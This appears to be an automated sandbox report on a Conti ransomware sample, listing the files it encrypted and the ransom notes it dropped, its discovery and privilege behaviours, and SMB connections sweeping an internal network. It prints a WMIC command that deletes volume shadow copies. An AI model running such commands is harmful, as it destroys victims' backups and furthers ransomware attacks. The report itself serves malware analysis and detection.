File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner_process.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-80.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\th.pak.DATA C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\UndoOpen.docm C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription2-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_F_COL.HXK C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\nl_get.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\it\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_MAK_AE-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019VL_MAK_AE-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F1454A4D-2AF3-49D4-9045-335EED1EFD8C}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F1454A4D-2AF3-49D4-9045-335EED1EFD8C}'" delete

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.253:445 tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
N/A 10.127.255.0:445 tcp
N/A 10.127.255.15:445 tcp
N/A 10.127.255.25:445 tcp
N/A 10.127.255.46:445 tcp
N/A 10.127.255.40:445 tcp
N/A 10.127.255.64:445 tcp
N/A 10.127.255.52:445 tcp
N/A 10.127.255.54:445 tcp
N/A 10.127.255.16:445 tcp
N/A 10.127.255.7:445 tcp
N/A 10.127.255.20:445 tcp
N/A 10.127.255.23:445 tcp
N/A 10.127.255.47:445 tcp
N/A 10.127.255.36:445 tcp
N/A 10.127.255.38:445 tcp
N/A 10.127.255.61:445 tcp
N/A 10.127.255.104:445 tcp
N/A 10.127.255.35:445 tcp
N/A 10.127.255.103:445 tcp
N/A 10.127.255.9:445 tcp
N/A 10.127.255.37:445 tcp
N/A 10.127.255.8:445 tcp
N/A 10.127.255.43:445 tcp
N/A 10.127.255.5:445 tcp
N/A 10.127.255.42:445 tcp
N/A 10.127.255.33:445 tcp
N/A 10.127.255.11:445 tcp
N/A 10.127.255.17:445 tcp
N/A 10.127.255.30:445 tcp
N/A 10.127.255.27:445 tcp
N/A 10.127.255.34:445 tcp
N/A 10.127.255.26:445 tcp
N/A 10.127.255.59:445 tcp
N/A 10.127.255.12:445 tcp
N/A 10.127.255.65:445 tcp
N/A 10.127.255.57:445 tcp
N/A 10.127.255.58:445 tcp
N/A 10.127.255.24:445 tcp
N/A 10.127.255.31:445 tcp
N/A 10.127.255.44:445 tcp
N/A 10.127.255.39:445 tcp
N/A 10.127.255.49:445 tcp
N/A 10.127.255.18:445 tcp
N/A 10.127.255.19:445 tcp
N/A 10.127.255.56:445 tcp
N/A 10.127.255.60:445 tcp
N/A 10.127.255.13:445 tcp
N/A 10.127.255.50:445 tcp
N/A 10.127.255.10:445 tcp
N/A 10.127.255.55:445 tcp
N/A 10.127.255.3:445 tcp
N/A 10.127.255.51:445 tcp
N/A 10.127.255.2:445 tcp
N/A 10.127.255.4:445 tcp
N/A 10.127.255.102:445 tcp
N/A 10.127.255.14:445 tcp
N/A 10.127.255.32:445 tcp
N/A 10.127.255.1:445 tcp
N/A 10.127.255.22:445 tcp
N/A 10.127.255.53:445 tcp
N/A 10.127.255.21:445 tcp
N/A 10.127.255.41:445 tcp
N/A 10.127.255.45:445 tcp
N/A 10.127.255.48:445 tcp
N/A 10.127.255.63:445 tcp
N/A 10.127.255.95:445 tcp
N/A 10.127.255.106:445 tcp
N/A 10.127.255.62:445 tcp
N/A 10.127.255.6:445 tcp
N/A 10.127.255.29:445 tcp
N/A 10.127.255.83:445 tcp
N/A 10.127.255.28:445 tcp
N/A 10.127.255.72:445 tcp
